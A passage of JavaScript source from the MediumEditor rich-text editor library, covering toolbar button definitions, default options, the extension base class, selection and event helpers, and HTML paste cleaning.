contentFA: '<i class="fa fa-indent"></i>'
},
'outdent': {
name: 'outdent',
action: 'outdent',
aria: 'outdent',
tagNames: [],
contentDefault: '<b>←</b>',
contentFA: '<i class="fa fa-outdent"></i>'
},
'justifyCenter': {
name: 'justifyCenter',
action: 'justifyCenter',
aria: 'center justify',
tagNames: [],
style: {
prop: 'text-align',
value: 'center'
},
contentDefault: '<b>C</b>',
contentFA: '<i class="fa fa-align-center"></i>'
},
'justifyFull': {
name: 'justifyFull',
action: 'justifyFull',
aria: 'full justify',
tagNames: [],
style: {
prop: 'text-align',
value: 'justify'
},
contentDefault: '<b>J</b>',
contentFA: '<i class="fa fa-align-justify"></i>'
},
'justifyLeft': {
name: 'justifyLeft',
action: 'justifyLeft',
aria: 'left justify',
tagNames: [],
style: {
prop: 'text-align',
value: 'left'
},
contentDefault: '<b>L</b>',
contentFA: '<i class="fa fa-align-left"></i>'
},
'justifyRight': {
name: 'justifyRight',
action: 'justifyRight',
aria: 'right justify',
tagNames: [],
style: {
prop: 'text-align',
value: 'right'
},
contentDefault: '<b>R</b>',
contentFA: '<i class="fa fa-align-right"></i>'
},
'header1': {
name: 'header1',
action: function (options) {
return 'append-' + options.firstHeader;
},
aria: function (options) {
return options.firstHeader;
},
tagNames: function (options) {
return [options.firstHeader];
},
contentDefault: '<b>H1</b>'
},
'header2': {
name: 'header2',
action: function (options) {
return 'append-' + options.secondHeader;
},
aria: function (options) {
return options.secondHeader;
},
tagNames: function (options) {
return [options.secondHeader];
},
contentDefault: '<b>H2</b>'
},
// Known inline elements that are not removed, or not removed consistantly across browsers:
// <span>, <label>, <br>
'removeFormat': {
name: 'removeFormat',
aria: 'remove formatting',
action: 'removeFormat',
contentDefault: '<b>X</b>',
contentFA: '<i class="fa fa-eraser"></i>'
}
};
})();
var editorDefaults;
(function () {
// summary: The default options hash used by the Editor
editorDefaults = {
allowMultiParagraphSelection: true,
anchorInputPlaceholder: 'Paste or type a link',
anchorInputCheckboxLabel: 'Open in new window',
anchorPreviewHideDelay: 500,
buttons: ['bold', 'italic', 'underline', 'anchor', 'header1', 'header2', 'quote'],
buttonLabels: false,
checkLinkFormat: false,
delay: 0,
diffLeft: 0,
diffTop: -10,
disableReturn: false,
disableDoubleReturn: false,
disableToolbar: false,
disableAnchorPreview: false,
disableEditing: false,
disablePlaceholders: false,
toolbarAlign: 'center',
elementsContainer: false,
imageDragging: true,
standardizeSelectionStart: false,
contentWindow: window,
ownerDocument: document,
firstHeader: 'h3',
placeholder: 'Type your text',
secondHeader: 'h4',
targetBlank: false,
anchorTarget: false,
anchorButton: false,
anchorButtonClass: 'btn',
extensions: {},
activeButtonClass: 'medium-editor-button-active',
firstButtonClass: 'medium-editor-button-first',
lastButtonClass: 'medium-editor-button-last',
spellcheck: true,
paste: {
forcePlainText: true,
cleanPastedHTML: false,
cleanAttrs: ['class', 'style', 'dir'],
cleanTags: ['meta']
}
};
})();
var Extension;
(function () {
Extension = function (options) {
Util.extend(this, options);
};
Extension.extend = function (protoProps) {
// magic extender thinger. mostly borrowed from backbone/goog.inherits
// place this function on some thing you want extend-able.
//
// example:
//
// function Thing(args){
// this.options = args;
// }
//
// Thing.prototype = { foo: "bar" };
// Thing.extend = extenderify;
//
// var ThingTwo = Thing.extend({ foo: "baz" });
//
// var thingOne = new Thing(); // foo === bar
// var thingTwo = new ThingTwo(); // foo == baz
//
// which seems like some simply shallow copy nonsense
// at first, but a lot more is going on there.
//
// passing a `constructor` to the extend props
// will cause the instance to instantiate through that
// instead of the parent's constructor.
var parent = this,
child;
// The constructor function for the new subclass is either defined by you
// (the "constructor" property in your `extend` definition), or defaulted
// by us to simply call the parent's constructor.
if (protoProps && protoProps.hasOwnProperty('constructor')) {
child = protoProps.constructor;
} else {
child = function () {
return parent.apply(this, arguments);
};
}
// das statics (.extend comes over, so your subclass can have subclasses too)
Util.extend(child, parent);
// Set the prototype chain to inherit from `parent`, without calling
// `parent`'s constructor function.
var Surrogate = function () {
this.constructor = child;
};
Surrogate.prototype = parent.prototype;
child.prototype = new Surrogate();
if (protoProps) {
Util.extend(child.prototype, protoProps);
}
// todo: $super?
return child;
};
Extension.prototype = {
init: function (/* instance */) {
// called when properly decorated and used.
// has a .base value pointing to the editor
// owning us. has been given a .name if no
// name present
},
/* parent: [boolean]
*
* setting this to true will set the .base property
* of the extension to be a reference to the
* medium-editor instance that is using the extension
*/
parent: false,
/* base: [MediumEditor instance]
*
* If .parent is set to true, this will be set to the
* current MediumEditor instance before init() is called
*/
base: null,
/* name: [string]
*
* 'name' of the extension, used for retrieving the extension.
* If not set, MediumEditor will set this to be the key
* used when passing the extension into MediumEditor via the
* 'extensions' option
*/
name: null,
/* checkState: [function (node)]
*
* If implemented, this function will be called one or more times
* the state of the editor & toolbar are updated.
* When the state is updated, the editor does the following:
*
* 1) Find the parent node containing the current selection
* 2) Call checkState on the extension, passing the node as an argument
* 3) Get tha parent node of the previous node
* 4) Repeat steps #2 and #3 until we move outside the parent contenteditable
*/
checkState: null,
/* getButton: [function ()]
*
* If implemented, this function will be called when
* the toolbar is being created. The DOM Element returned
* by this function will be appended to the toolbar along
* with any other buttons.
*/
getButton: null,
/* As alternatives to checkState, these functions provide a more structured
* path to updating the state of an extension (usually a button) whenever
* the state of the editor & toolbar are updated.
*/
/* queryCommandState: [function ()]
*
* If implemented, this function will be called once on each extension
* when the state of the editor/toolbar is being updated.
*
* If this function returns a non-null value, the exntesion will
* be ignored as the code climbs the dom tree.
*
* If this function returns true, and the setActive() function is defined
* setActive() will be called
*/
queryCommandState: null,
/* isActive: [function ()]
*
* If implemented, this function will be called when MediumEditor
* has determined that this extension is 'active' for the current selection.
* This may be called when the editor & toolbar are being updated,
* but only if queryCommandState() or isAlreadyApplied() functions
* are implemented, and when called, return true.
*/
isActive: null,
/* isAlreadyApplied: [function (node)]
*
* If implemented, this function is similar to checkState() in
* that it will be calle repeatedly as MediumEditor moves up
* the DOM to update the editor & toolbar after a state change.
*
* NOTE: This function will NOT be called if checkState() has
* been implemented. This function will NOT be called if
* queryCommandState() is implemented and returns a non-null
* value when called
*/
isAlreadyApplied: null,
/* setActive: [function ()]
*
* If implemented, this function is called when MediumEditor knows
* that this extension is currently enabled. Currently, this
* function is called when updating the editor & toolbar, and
* only if queryCommandState() or isAlreadyApplied(node) return
* true when called
*/
setActive: null,
/* setInactive: [function ()]
*
* If implemented, this function is called when MediumEditor knows
* that this extension is currently disabled. Curently, this
* is called at the beginning of each state change for
* the editor & toolbar. After calling this, MediumEditor
* will attempt to update the extension, either via checkState()
* or the combination of queryCommandState(), isAlreadyApplied(node),
* isActive(), and setActive()
*/
setInactive: null,
/* onHide: [function ()]
*
* If implemented, this function is called each time the
* toolbar is hidden
*/
onHide: null
};
})();
var Selection;
(function () {
'use strict';
Selection = {
findMatchingSelectionParent: function (testElementFunction, contentWindow) {
var selection = contentWindow.getSelection(),
range,
current;
if (selection.rangeCount === 0) {
return false;
}
range = selection.getRangeAt(0);
current = range.commonAncestorContainer;
return Util.traverseUp(current, testElementFunction);
},
getSelectionElement: function (contentWindow) {
return this.findMatchingSelectionParent(function (el) {
return el.getAttribute('data-medium-element');
}, contentWindow);
},
selectionInContentEditableFalse: function (contentWindow) {
return this.findMatchingSelectionParent(function (el) {
return (el && el.nodeName !== '#text' && el.getAttribute('contenteditable') === 'false');
}, contentWindow);
},
// http://stackoverflow.com/questions/4176923/html-of-selected-text
// by Tim Down
getSelectionHtml: function getSelectionHtml() {
var i,
html = '',
sel = this.options.contentWindow.getSelection(),
len,
container;
if (sel.rangeCount) {
container = this.options.ownerDocument.createElement('div');
for (i = 0, len = sel.rangeCount; i < len; i += 1) {
container.appendChild(sel.getRangeAt(i).cloneContents());
}
html = container.innerHTML;
}
return html;
},
/**
* Find the caret position within an element irrespective of any inline tags it may contain.
*
* @param {DOMElement} An element containing the cursor to find offsets relative to.
* @param {Range} A Range representing cursor position. Will window.getSelection if none is passed.
* @return {Object} 'left' and 'right' attributes contain offsets from begining and end of Element
*/
getCaretOffsets: function getCaretOffsets(element, range) {
var preCaretRange, postCaretRange;
if (!range) {
range = window.getSelection().getRangeAt(0);
}
preCaretRange = range.cloneRange();
postCaretRange = range.cloneRange();
preCaretRange.selectNodeContents(element);
preCaretRange.setEnd(range.endContainer, range.endOffset);
postCaretRange.selectNodeContents(element);
postCaretRange.setStart(range.endContainer, range.endOffset);
return {
left: preCaretRange.toString().length,
right: postCaretRange.toString().length
};
},
// http://stackoverflow.com/questions/15867542/range-object-get-selection-parent-node-chrome-vs-firefox
rangeSelectsSingleNode: function (range) {
var startNode = range.startContainer;
return startNode === range.endContainer &&
startNode.hasChildNodes() &&
range.endOffset === range.startOffset + 1;
},
getSelectedParentElement: function (range) {
var selectedParentElement = null;
if (this.rangeSelectsSingleNode(range) && range.startContainer.childNodes[range.startOffset].nodeType !== 3) {
selectedParentElement = range.startContainer.childNodes[range.startOffset];
} else if (range.startContainer.nodeType === 3) {
selectedParentElement = range.startContainer.parentNode;
} else {
selectedParentElement = range.startContainer;
}
return selectedParentElement;
},
getSelectedElements: function (doc) {
var selection = doc.getSelection(),
range,
toRet,
currNode;
if (!selection.rangeCount ||
!selection.getRangeAt(0).commonAncestorContainer) {
return [];
}
range = selection.getRangeAt(0);
if (range.commonAncestorContainer.nodeType === 3) {
toRet = [];
currNode = range.commonAncestorContainer;
while (currNode.parentNode && currNode.parentNode.childNodes.length === 1) {
toRet.push(currNode.parentNode);
currNode = currNode.parentNode;
}
return toRet;
}
return [].filter.call(range.commonAncestorContainer.getElementsByTagName('*'), function (el) {
return (typeof selection.containsNode === 'function') ? selection.containsNode(el, true) : true;
});
},
selectNode: function (node, doc) {
var range = doc.createRange(),
sel = doc.getSelection();
range.selectNodeContents(node);
sel.removeAllRanges();
sel.addRange(range);
}
};
}());
var Events;
(function () {
'use strict';
Events = function (instance) {
this.base = instance;
this.options = this.base.options;
this.events = [];
this.customEvents = {};
this.listeners = {};
};
Events.prototype = {
// Helpers for event handling
attachDOMEvent: function (target, event, listener, useCapture) {
target.addEventListener(event, listener, useCapture);
this.events.push([target, event, listener, useCapture]);
},
detachDOMEvent: function (target, event, listener, useCapture) {
var index = this.indexOfListener(target, event, listener, useCapture),
e;
if (index !== -1) {
e = this.events.splice(index, 1)[0];
e[0].removeEventListener(e[1], e[2], e[3]);
}
},
indexOfListener: function (target, event, listener, useCapture) {
var i, n, item;
for (i = 0, n = this.events.length; i < n; i = i + 1) {
item = this.events[i];
if (item[0] === target && item[1] === event && item[2] === listener && item[3] === useCapture) {
return i;
}
}
return -1;
},
detachAllDOMEvents: function () {
var e = this.events.pop();
while (e) {
e[0].removeEventListener(e[1], e[2], e[3]);
e = this.events.pop();
}
},
// custom events
attachCustomEvent: function (event, listener) {
this.setupListener(event);
// If we don't suppot this custom event, don't do anything
if (this.listeners[event]) {
if (!this.customEvents[event]) {
this.customEvents[event] = [];
}
this.customEvents[event].push(listener);
}
},
detachCustomEvent: function (event, listener) {
var index = this.indexOfCustomListener(event, listener);
if (index !== -1) {
this.customEvents[event].splice(index, 1);
// TODO: If array is empty, should detach internal listeners via destoryListener()
}
},
indexOfCustomListener: function (event, listener) {
if (!this.customEvents[event] || !this.customEvents[event].length) {
return -1;
}
return this.customEvents[event].indexOf(listener);
},
detachAllCustomEvents: function () {
this.customEvents = {};
// TODO: Should detach internal listeners here via destroyListener()
},
triggerCustomEvent: function (name, data, editable) {
if (this.customEvents[name]) {
this.customEvents[name].forEach(function (listener) {
listener(data, editable);
});
}
},
// Listening to browser events to emit events medium-editor cares about
setupListener: function (name) {
if (this.listeners[name]) {
return;
}
switch (name) {
case 'externalInteraction':
// Detecting when user has interacted with elements outside of MediumEditor
this.attachDOMEvent(this.options.ownerDocument.body, 'mousedown', this.handleBodyMousedown.bind(this), true);
this.attachDOMEvent(this.options.ownerDocument.body, 'click', this.handleBodyClick.bind(this), true);
this.attachDOMEvent(this.options.ownerDocument.body, 'focus', this.handleBodyFocus.bind(this), true);
this.listeners[name] = true;
break;
case 'blur':
// Detecting when focus is lost
this.setupListener('externalInteraction');
this.listeners[name] = true;
break;
case 'focus':
// Detecting when focus moves into some part of MediumEditor
this.setupListener('externalInteraction');
this.listeners[name] = true;
break;
case 'editableClick':
// Detecting click in the contenteditables
this.base.elements.forEach(function (element) {
this.attachDOMEvent(element, 'click', this.handleClick.bind(this));
}.bind(this));
this.listeners[name] = true;
break;
case 'editableBlur':
// Detecting blur in the contenteditables
this.base.elements.forEach(function (element) {
this.attachDOMEvent(element, 'blur', this.handleBlur.bind(this));
}.bind(this));
this.listeners[name] = true;
break;
case 'editableKeypress':
// Detecting keypress in the contenteditables
this.base.elements.forEach(function (element) {
this.attachDOMEvent(element, 'keypress', this.handleKeypress.bind(this));
}.bind(this));
this.listeners[name] = true;
break;
case 'editableKeyup':
// Detecting keyup in the contenteditables
this.base.elements.forEach(function (element) {
this.attachDOMEvent(element, 'keyup', this.handleKeyup.bind(this));
}.bind(this));
this.listeners[name] = true;
break;
case 'editableKeydown':
// Detecting keydown on the contenteditables
this.base.elements.forEach(function (element) {
this.attachDOMEvent(element, 'keydown', this.handleKeydown.bind(this));
}.bind(this));
this.listeners[name] = true;
break;
case 'editableKeydownEnter':
// Detecting keydown for ENTER on the contenteditables
this.setupListener('editableKeydown');
this.listeners[name] = true;
break;
case 'editableKeydownTab':
// Detecting keydown for TAB on the contenteditable
this.setupListener('editableKeydown');
this.listeners[name] = true;
break;
case 'editableKeydownDelete':
// Detecting keydown for DELETE/BACKSPACE on the contenteditables
this.setupListener('editableKeydown');
this.listeners[name] = true;
break;
case 'editableMouseover':
// Detecting mouseover on the contenteditables
this.base.elements.forEach(function (element) {
this.attachDOMEvent(element, 'mouseover', this.handleMouseover.bind(this));
}, this);
this.listeners[name] = true;
break;
case 'editableDrag':
// Detecting dragover and dragleave on the contenteditables
this.base.elements.forEach(function (element) {
this.attachDOMEvent(element, 'dragover', this.handleDragging.bind(this));
this.attachDOMEvent(element, 'dragleave', this.handleDragging.bind(this));
}, this);
this.listeners[name] = true;
break;
case 'editableDrop':
// Detecting drop on the contenteditables
this.base.elements.forEach(function (element) {
this.attachDOMEvent(element, 'drop', this.handleDrop.bind(this));
}, this);
this.listeners[name] = true;
break;
case 'editablePaste':
// Detecting paste on the contenteditables
this.base.elements.forEach(function (element) {
this.attachDOMEvent(element, 'paste', this.handlePaste.bind(this));
}, this);
this.listeners[name] = true;
break;
}
},
focusElement: function (element) {
element.focus();
this.updateFocus(element, { target: element, type: 'focus' });
},
updateFocus: function (target, eventObj) {
var toolbarEl = this.base.toolbar ? this.base.toolbar.getToolbarElement() : null,
anchorPreview = this.base.getExtensionByName('anchor-preview'),
previewEl = (anchorPreview && anchorPreview.getPreviewElement) ? anchorPreview.getPreviewElement() : null,
hadFocus,
toFocus;
this.base.elements.some(function (element) {
// Find the element that has focus
if (!hadFocus && element.getAttribute('data-medium-focused')) {
hadFocus = element;
}
// bail if we found the element that had focus
return !!hadFocus;
}, this);
// For clicks, we need to know if the mousedown that caused the click happened inside the existing focused element.
// If so, we don't want to focus another element
if (hadFocus &&
eventObj.type === 'click' &&
this.lastMousedownTarget &&
(Util.isDescendant(hadFocus, this.lastMousedownTarget, true) ||
Util.isDescendant(toolbarEl, this.lastMousedownTarget, true) ||
Util.isDescendant(previewEl, this.lastMousedownTarget, true))) {
toFocus = hadFocus;
}
if (!toFocus) {
this.base.elements.some(function (element) {
// If the target is part of an editor element, this is the element getting focus
if (!toFocus && (Util.isDescendant(element, target, true))) {
toFocus = element;
}
// bail if we found an element that's getting focus
return !!toFocus;
}, this);
}
// Check if the target is external (not part of the editor, toolbar, or anchorpreview)
var externalEvent = !Util.isDescendant(hadFocus, target, true) &&
!Util.isDescendant(toolbarEl, target, true) &&
!Util.isDescendant(previewEl, target, true);
if (toFocus !== hadFocus) {
// If element has focus, and focus is going outside of editor
// Don't blur focused element if clicking on editor, toolbar, or anchorpreview
if (hadFocus && externalEvent) {
// Trigger blur on the editable that has lost focus
hadFocus.removeAttribute('data-medium-focused');
this.triggerCustomEvent('blur', eventObj, hadFocus);
}
// If focus is going into an editor element
if (toFocus) {
// Trigger focus on the editable that now has focus
toFocus.setAttribute('data-medium-focused', true);
this.triggerCustomEvent('focus', eventObj, toFocus);
}
}
if (externalEvent) {
this.triggerCustomEvent('externalInteraction', eventObj);
}
},
handleBodyClick: function (event) {
this.updateFocus(event.target, event);
},
handleBodyFocus: function (event) {
this.updateFocus(event.target, event);
},
handleBodyMousedown: function (event) {
this.lastMousedownTarget = event.target;
},
handleClick: function (event) {
this.triggerCustomEvent('editableClick', event, event.currentTarget);
},
handleBlur: function (event) {
this.triggerCustomEvent('editableBlur', event, event.currentTarget);
},
handleKeypress: function (event) {
this.triggerCustomEvent('editableKeypress', event, event.currentTarget);
},
handleKeyup: function (event) {
this.triggerCustomEvent('editableKeyup', event, event.currentTarget);
},
handleMouseover: function (event) {
this.triggerCustomEvent('editableMouseover', event, event.currentTarget);
},
handleDragging: function (event) {
this.triggerCustomEvent('editableDrag', event, event.currentTarget);
},
handleDrop: function (event) {
this.triggerCustomEvent('editableDrop', event, event.currentTarget);
},
handlePaste: function (event) {
this.triggerCustomEvent('editablePaste', event, event.currentTarget);
},
handleKeydown: function (event) {
this.triggerCustomEvent('editableKeydown', event, event.currentTarget);
switch (event.which) {
case Util.keyCode.ENTER:
this.triggerCustomEvent('editableKeydownEnter', event, event.currentTarget);
break;
case Util.keyCode.TAB:
this.triggerCustomEvent('editableKeydownTab', event, event.currentTarget);
break;
case Util.keyCode.DELETE:
case Util.keyCode.BACKSPACE:
this.triggerCustomEvent('editableKeydownDelete', event, event.currentTarget);
break;
}
}
};
}());
var DefaultButton;
(function () {
'use strict';
DefaultButton = function (options, instance) {
this.options = options;
this.name = options.name;
this.init(instance);
};
DefaultButton.prototype = {
init: function (instance) {
this.base = instance;
this.button = this.createButton();
this.base.on(this.button, 'click', this.handleClick.bind(this));
if (this.options.key) {
this.base.subscribe('editableKeydown', this.handleKeydown.bind(this));
}
},
getButton: function () {
return this.button;
},
getAction: function () {
return (typeof this.options.action === 'function') ? this.options.action(this.base.options) : this.options.action;
},
getAria: function () {
return (typeof this.options.aria === 'function') ? this.options.aria(this.base.options) : this.options.aria;
},
getTagNames: function () {
return (typeof this.options.tagNames === 'function') ? this.options.tagNames(this.base.options) : this.options.tagNames;
},
createButton: function () {
var button = this.base.options.ownerDocument.createElement('button'),
content = this.options.contentDefault,
ariaLabel = this.getAria();
button.classList.add('medium-editor-action');
button.classList.add('medium-editor-action-' + this.name);
button.setAttribute('data-action', this.getAction());
if (ariaLabel) {
button.setAttribute('title', ariaLabel);
button.setAttribute('aria-label', ariaLabel);
}
if (this.base.options.buttonLabels) {
if (this.base.options.buttonLabels === 'fontawesome' && this.options.contentFA) {
content = this.options.contentFA;
} else if (typeof this.base.options.buttonLabels === 'object' && this.base.options.buttonLabels[this.name]) {
content = this.base.options.buttonLabels[this.options.name];
}
}
button.innerHTML = content;
return button;
},
handleKeydown: function (evt) {
var key, action;
if (evt.ctrlKey || evt.metaKey) {
key = String.fromCharCode(evt.which || evt.keyCode).toLowerCase();
if (this.options.key === key) {
evt.preventDefault();
evt.stopPropagation();
action = this.getAction();
if (action) {
this.base.execAction(action);
}
}
}
},
handleClick: function (evt) {
evt.preventDefault();
evt.stopPropagation();
var action = this.getAction();
if (action) {
this.base.execAction(action);
}
},
isActive: function () {
return this.button.classList.contains(this.base.options.activeButtonClass);
},
setInactive: function () {
this.button.classList.remove(this.base.options.activeButtonClass);
delete this.knownState;
},
setActive: function () {
this.button.classList.add(this.base.options.activeButtonClass);
delete this.knownState;
},
queryCommandState: function () {
var queryState = null;
if (this.options.useQueryState) {
queryState = this.base.queryCommandState(this.getAction());
}
return queryState;
},
isAlreadyApplied: function (node) {
var isMatch = false,
tagNames = this.getTagNames(),
styleVals,
computedStyle;
if (this.knownState === false || this.knownState === true) {
return this.knownState;
}
if (tagNames && tagNames.length > 0 && node.tagName) {
isMatch = tagNames.indexOf(node.tagName.toLowerCase()) !== -1;
}
if (!isMatch && this.options.style) {
styleVals = this.options.style.value.split('|');
computedStyle = this.base.options.contentWindow.getComputedStyle(node, null).getPropertyValue(this.options.style.prop);
styleVals.forEach(function (val) {
if (!this.knownState) {
isMatch = (computedStyle.indexOf(val) !== -1);
// text-decoration is not inherited by default
// so if the computed style for text-decoration doesn't match
// don't write to knownState so we can fallback to other checks
if (isMatch || this.options.style.prop !== 'text-decoration') {
this.knownState = isMatch;
}
}
}, this);
}
return isMatch;
}
};
}());
var PasteHandler;
(function () {
'use strict';
/*jslint regexp: true*/
/*
jslint does not allow character negation, because the negation
will not match any unicode characters. In the regexes in this
block, negation is used specifically to match the end of an html
tag, and in fact unicode characters *should* be allowed.
*/
function createReplacements() {
return [
// replace two bogus tags that begin pastes from google docs
[new RegExp(/<[^>]*docs-internal-guid[^>]*>/gi), ''],
[new RegExp(/<\/b>(<br[^>]*>)?$/gi), ''],
// un-html spaces and newlines inserted by OS X
[new RegExp(/<span class="Apple-converted-space">\s+<\/span>/g), ' '],
[new RegExp(/<br class="Apple-interchange-newline">/g), '<br>'],
// replace google docs italics+bold with a span to be replaced once the html is inserted
[new RegExp(/<span[^>]*(font-style:italic;font-weight:bold|font-weight:bold;font-style:italic)[^>]*>/gi), '<span class="replace-with italic bold">'],
// replace google docs italics with a span to be replaced once the html is inserted
[new RegExp(/<span[^>]*font-style:italic[^>]*>/gi), '<span class="replace-with italic">'],
//[replace google docs bolds with a span to be replaced once the html is inserted
[new RegExp(/<span[^>]*font-weight:bold[^>]*>/gi), '<span class="replace-with bold">'],
// replace manually entered b/i/a tags with real ones
[new RegExp(/<(\/?)(i|b|a)>/gi), '<$1$2>'],
// replace manually a tags with real ones, converting smart-quotes from google docs
[new RegExp(/<a(?:(?!href).)+href=(?:"|”|“|"|“|”)(((?!"|”|“|"|“|”).)*)(?:"|”|“|"|“|”)(?:(?!>).)*>/gi), '<a href="$1">'],
// Newlines between paragraphs in html have no syntactic value,
// but then have a tendency to accidentally become additional paragraphs down the line
[new RegExp(/<\/p>\n+/gi), '</p>'],
[new RegExp(/\n+<p/gi), '<p'],
// Microsoft Word makes these odd tags, like <o:p></o:p>
[new RegExp(/<\/?o:[a-z]*>/gi), '']
];
}
/*jslint regexp: false*/
PasteHandler = Extension.extend({
/* Paste Options */
/* forcePlainText: [boolean]
* Forces pasting as plain text.
*/
forcePlainText: true,
/* cleanPastedHTML: [boolean]
* cleans pasted content from different sources, like google docs etc.
*/
cleanPastedHTML: false,
/* cleanReplacements: [Array]
* custom pairs (2 element arrays) of RegExp and replacement text to use during paste when
* __forcePlainText__ or __cleanPastedHTML__ are `true` OR when calling `cleanPaste(text)` helper method.
*/
cleanReplacements: [],
/* cleanAttrs:: [Array]
* list of element attributes to remove during paste when __cleanPastedHTML__ is `true` or when
* calling `cleanPaste(text)` or `pasteHTML(html, options)` helper methods.
*/
cleanAttrs: ['class', 'style', 'dir'],
/* cleanTags: [Array]
* list of element tag names to remove during paste when __cleanPastedHTML__ is `true` or when
* calling `cleanPaste(text)` or `pasteHTML(html, options)` helper methods.
*/
cleanTags: ['meta'],
/* ----- internal options needed from base ----- */
'window': window,
'document': document,
targetBlank: false,
disableReturn: false,
// Need a reference to MediumEditor (this.base)
parent: true,
init: function () {
if (this.forcePlainText || this.cleanPastedHTML) {
this.base.subscribe('editablePaste', this.handlePaste.bind(this));
}
},
handlePaste: function (event, element) {
var paragraphs,
html = '',
p,
dataFormatHTML = 'text/html',
dataFormatPlain = 'text/plain',
pastedHTML,
pastedPlain;
if (this.window.clipboardData && event.clipboardData === undefined) {
event.clipboardData = this.window.clipboardData;
// If window.clipboardData exists, but event.clipboardData doesn't exist,
// we're probably in IE. IE only has two possibilities for clipboard
// data format: 'Text' and 'URL'.
//
// Of the two, we want 'Text':
dataFormatHTML = 'Text';
dataFormatPlain = 'Text';
}
if (event.clipboardData &&
event.clipboardData.getData &&
!event.defaultPrevented) {
event.preventDefault();
pastedHTML = event.clipboardData.getData(dataFormatHTML);
pastedPlain = event.clipboardData.getData(dataFormatPlain);
if (!pastedHTML) {
pastedHTML = pastedPlain;
}
if (this.cleanPastedHTML && pastedHTML) {
return this.cleanPaste(pastedHTML);
}
if (!(this.disableReturn || element.getAttribute('data-disable-return'))) {
paragraphs = pastedPlain.split(/[\r\n]+/g);
// If there are no \r\n in data, don't wrap in <p>
if (paragraphs.length > 1) {
for (p = 0; p < paragraphs.length; p += 1) {
if (paragraphs[p] !== '') {
html += '<p>' + Util.htmlEntities(paragraphs[p]) + '</p>';
}
}
} else {
html = Util.htmlEntities(paragraphs[0]);
}
} else {
html = Util.htmlEntities(pastedPlain);
}
Util.insertHTMLCommand(this.document, html);
}
},
cleanPaste: function (text) {
var i, elList, workEl,
el = Selection.getSelectionElement(this.window),
multiline = /<p|<br|<div/.test(text),
replacements = createReplacements().concat(this.cleanReplacements || []);
for (i = 0; i < replacements.length; i += 1) {
text = text.replace(replacements[i][0], replacements[i][1]);
}
if (multiline) {
// double br's aren't converted to p tags, but we want paragraphs.
elList = text.split('<br><br>');
this.pasteHTML('<p>' + elList.join('</p><p>') + '</p>');
try {
this.document.execCommand('insertText', false, '\n');
} catch (ignore) { }
// block element cleanup
elList = el.querySelectorAll('a,p,div,br');
for (i = 0; i < elList.length; i += 1) {
workEl = elList[i];
// Microsoft Word replaces some spaces with newlines.
// While newlines between block elements are meaningless, newlines within
// elements are sometimes actually spaces.
workEl.innerHTML = workEl.innerHTML.replace(/\n/gi, ' ');
switch (workEl.tagName.toLowerCase()) {
case 'a':
if (this.targetBlank) {
Util.setTargetBlank(workEl);
}
break;
case 'p':
case 'div':
this.filterCommonBlocks(workEl);
break;
case 'br':
this.filterLineBreak(workEl);
break;
}
}
} else {
this.pasteHTML(text);
}
},
pasteHTML: function (html, options) {
options = Util.defaults({}, options, {
cleanAttrs: this.cleanAttrs,
cleanTags: this.cleanTags
});
var elList, workEl, i, fragmentBody, pasteBlock = this.document.createDocumentFragment();
pasteBlock.appendChild(this.document.createElement('body'));
fragmentBody = pasteBlock.querySelector('body');
fragmentBody.innerHTML = html;
this.cleanupSpans(fragmentBody);
elList = fragmentBody.querySelectorAll('*');
for (i = 0; i < elList.length; i += 1) {
workEl = elList[i];
Util.cleanupAttrs(workEl, options.cleanAttrs);
Util.cleanupTags(workEl, options.cleanTags);
}
Util.insertHTMLCommand(this.document, fragmentBody.innerHTML.replace(/ /g, ' '));
},
isCommonBlock: function (el) {
return (el && (el.tagName.toLowerCase() === 'p' || el.tagName.toLowerCase() === 'div'));
},
filterCommonBlocks: function (el) {
if (/^\s*$/.test(el.textContent) && el.parentNode) {
el.parentNode.removeChild(el);
}
},
filterLineBreak: function (el) {
if (this.isCommonBlock(el.previousElementSibling)) {
// remove stray br's following common block elements
this.removeWithParent(el);
} else if (this.isCommonBlock(el.parentNode) && (el.parentNode.firstChild === el || el.parentNode.lastChild === el)) {
// remove br's just inside open or close tags of a div/p
this.removeWithParent(el);
} else if (el.parentNode && el.parentNode.childElementCount === 1 && el.parentNode.textContent === '') {
// and br's that are the only child of elements other than div/p
this.removeWithParent(el);
}
},
// remove an element, including its parent, if it is the only element within its parent
removeWithParent: function (el) {
if (el && el.parentNode) {
if (el.parentNode.parentNode && el.parentNode.childElementCount === 1) {
el.parentNode.parentNode.removeChild(el.parentNode);
} else {
el.parentNode.removeChild(el);
}
}
},
cleanupSpans: function (containerEl) {
var i,
el,
newEl,
spans = containerEl.querySelectorAll('.replace-with'),
isCEF = function (el) {
return (el && el.nodeName !== '#text' && el.getAttribute('contenteditable') === 'false');
};
for (i = 0; i < spans.length; i += 1) {
el = spans[i];
newEl = this.document.createElement(el.classList.contains('bold') ? 'b' : 'i');
if (el.classList.contains('bold') && el.classList.contains('italic')) {
// add an i tag as well if this has both italics and bold
newEl.innerHTML = '<i>' + el.innerHTML + '</i>';
} else {
newEl.innerHTML = el.innerHTML;
}
el.parentNode.replaceChild(newEl, el);
}
spans = containerEl.querySelectorAll('span');
for (i = 0; i < spans.length; i += 1) {
el = spans[i];
// bail if span is in contenteditable = false
if (Util.traverseUp(el, isCEF)) {
return false;
}
// remove empty spans, replace others with their contents
Util.unwrap(el, this.document);
}
}
});
}());
var AnchorExtension; |
function AnchorDerived() {
this.parent = true;
this.options = {
name: 'anchor',
action: 'createLink',
aria: 'link',
tagNames: ['a'],
contentDefault: '<b>#</b>',
contentFA: '<i class="fa fa-link"></i>'
};
this.name = 'anchor';
this.hasForm = true;
}
AnchorDerived.prototype = {
// Button and Extension handling
// labels for the anchor-edit form buttons
formSaveLabel: '✓',
formCloseLabel: '×',
// Called when the button the toolbar is clicked
// Overrides DefaultButton.handleClick
handleClick: function (evt) {
evt.preventDefault();
evt.stopPropagation();
var selectedParentElement = Selection.getSelectedParentElement(Util.getSelectionRange(this.base.options.ownerDocument));
if (selectedParentElement.tagName &&
selectedParentElement.tagName.toLowerCase() === 'a') {
return this.base.execAction('unlink');
}
if (!this.isDisplayed()) {
this.showForm();
}
return false;
},
// Called by medium-editor to append form to the toolbar
getForm: function () {
if (!this.form) {
this.form = this.createForm();
}
return this.form;
},
getTemplate: function () {
var template = [
'<input type="text" class="medium-editor-toolbar-input" placeholder="', this.base.options.anchorInputPlaceholder, '">'
];
template.push(
'<a href="#" class="medium-editor-toolbar-save">',
this.base.options.buttonLabels === 'fontawesome' ? '<i class="fa fa-check"></i>' : this.formSaveLabel,
'</a>'
);
template.push('<a href="#" class="medium-editor-toolbar-close">',
